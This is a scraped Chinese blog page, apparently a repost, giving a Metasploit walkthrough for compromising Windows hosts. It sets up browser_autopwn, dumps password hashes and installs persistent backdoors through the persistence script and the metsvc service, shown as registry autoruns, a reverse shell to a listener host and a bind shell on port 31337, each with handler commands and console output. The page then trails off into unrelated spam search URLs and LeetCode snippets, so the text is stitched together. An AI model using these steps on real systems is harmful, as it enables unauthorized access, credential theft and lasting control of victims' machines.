search autopwn

use server/browser_autopwn

show options

set LHOST

set SRVPORT

set URIPATH /

show options

修改 etter.conf 文件

if you use ipchains

if you use iptables

得到sessions后

run hashdump

run persistence -X -i 5 -p 445 -r 192.168.1.106

Metasploit之建立backdoor一二

1.meterpreter自带脚本

方法1.run presistence

可以使用run presistence -h查看选项:

meterpreter > run persistence -U -i 5 -p 443 -r 192.168.1.139

[*] Running Persistance Script

[*] Resource file for cleanup created at

/root/.msf4/logs/persistence/WIN03SP0_20130122.2044/WIN03SP0_20130122.2044.rc

[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.139

LPORT=443

[*] Persistent agent script is 609496 bytes long

[+] Persistent Script written to C:\WINDOWS\TEMP\zvlYoXnVYFbR.vbs

[*] Executing script C:\WINDOWS\TEMP\zvlYoXnVYFbR.vbs

[+] Agent executed with PID 3272

[*] Installing into autorun as HKCU\Software\Microsoft\Windows

\CurrentVersion\Run\FCBCUBtLrzFY

[+] Installed into autorun as HKCU\Software\Microsoft\Windows

\CurrentVersion\Run\FCBCUBtLrzFY

可以看到添加启动是通过,添加注册表键值,启动的是vbs脚本的后门。

连接:

msf > use exploit/multi/handler

msf  exploit(handler) > set payload windows/metsvc_bind_tcp

payload => windows/metsvc_bind_tcp

msf  exploit(handler) > set LHOST 192.168.1.139

LHOST => 192.168.1.139

msf  exploit(handler) > set LPORT 443

LPORT => 443

msf  exploit(handler) > exploit

[*] Started bind handler

[*] Starting the payload handler...

默认没启动,目标机重启后,可以成功获得meterpreter shell

方法2.run metsvc

执行metsvc 脚本

meterpreter > run metsvc -A

[*] Creating a meterpreter service on port 31337

[*] Creating a temporary installation directory C:\WINDOWS\TEMP

\kqaqtcsWhBTbO...

[*]  >> Uploading metsrv.dll...

[*]  >> Uploading metsvc-server.exe...

[*]  >> Uploading metsvc.exe...

[*] Starting the service...

* Installing service metsvc

* Starting service

Service metsvc successfully installed.

[*] Trying to connect to the Meterpreter service at 192.168.1.108:31337...

新建的服务,加自启动(映像名称metsvc.exe,服务metsvc ),连接到后门:

msf > use exploit/multi/handler

msf  exploit(handler) > set payload windows/metsvc_bind_tcp

payload => windows/metsvc_bind_tcp

msf  exploit(handler) > set LPORT 31337

LPORT => 31337

msf  exploit(handler) > set RHOST 192.168.1.108

RHOST => 192.168.1.108

msf  exploit(handler) > exploit

[*] Started bind handler

[*] Starting the payload handler...

meterpreter >

成功连接

原文地址:https://www.cnblogs.com/journeyIT/p/8259946.html

时间: 2024-08-30 04:25:15

search autopwn的相关文章

kali metasploit 之 autopwn 浏览器钓鱼,java漏洞

本文介绍的autopwn是kali中自带的那个autopwn, 不是相对于bt5被删除的那个autopwn. 1.打开msfconsole, 找出autopwn目录及使用 msf > search autopwn Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/server/browser_autopwn

是神功盖世

http://ypk.39.net/search/all?k=%A1%E8%D1%CE%CB%E1%C7%FA%C2%ED%B6%E0%C4%C4%C0%EF%D3%D0%C2%F4Q%A3%BA%A3%B8%A3%B6%A3%B3%A3%B9%A3%B0%A3%B2%A3%B9%A3%B6%A3%B2%A8x http://ypk.39.net/search/all?k=%A8z%C4%C4%C0%EF%C2%F2%D1%CE%CB%E1%C7%FA%C2%ED%B6%E0Q%A3%BA%A3

如何如何让额呵呵

http://ypk.39.net/search/all?k=%A1%BF%BC%CE%D0%CB%B0%B2%C3%DF%D2%A9%C4%C4%C0%EF%D3%D0%C2%F4Q%A3%BA%A3%B8%A3%B6%A3%B3%A3%B9%A3%B0%A3%B2%A3%B9%A3%B6%A3%B2%A1%F3 http://ypk.39.net/search/all?k=%A1%BF%BA%FE%D6%DD%B0%B2%C3%DF%D2%A9%C4%C4%C0%EF%D3%D0%C2%F4

尽忽悠哥太烦人的一样

http://ypk.39.net/search/all?k=%A1%F5%C4%C4%C0%EF%D3%D0%C7%FA%C2%ED%B6%E0%C2%F4Q%A3%BA%A3%B2%A3%B0%A3%B8%A3%B6%A3%B0%A3%B6%A3%B7%A3%B5%20 http://ypk.39.net/search/all?k=%A8%7B%C4%C4%C0%EF%D3%D0%C2%F4%C7%FA%C2%ED%B6%E0Q%A3%BA%A3%B2%A3%B0%A3%B8%A3%B6%A

[LeetCode] Find Mode in Binary Search Tree 找二分搜索数的众数

Given a binary search tree (BST) with duplicates, find all the mode(s) (the most frequently occurred element) in the given BST. Assume a BST is defined as follows: The left subtree of a node contains only nodes with keys less than or equal to the nod

235. Lowest Common Ancestor of a Binary Search Tree

1. 问题描述 Given a binary search tree (BST), find the lowest common ancestor (LCA) of two given nodes in the BST.According to the definition of LCA on Wikipedia: “The lowest common ancestor is defined between two nodes v and w as the lowest node in T th

Leetcode 34. Search for a Range

34. Search for a Range Total Accepted: 91570 Total Submissions: 308037 Difficulty: Medium Given a sorted array of integers, find the starting and ending position of a given target value. Your algorithm's runtime complexity must be in the order of O(l

leetcode 109 Convert Sorted List to Binary Search Tree

题目连接 https://leetcode.com/problems/convert-sorted-list-to-binary-search-tree/ Convert Sorted List to Binary Search Tree Description Given a singly linked list where elements are sorted in ascending order, convert it to a height balanced BST. /** * De

Lowest Common Ancestor of a Binary Search Tree

1. Title 235. Lowest Common Ancestor of a Binary Search Tree 2. Http address https://leetcode.com/problems/lowest-common-ancestor-of-a-binary-search-tree/ 3. The question Given a binary search tree (BST), find the lowest common ancestor (LCA) of two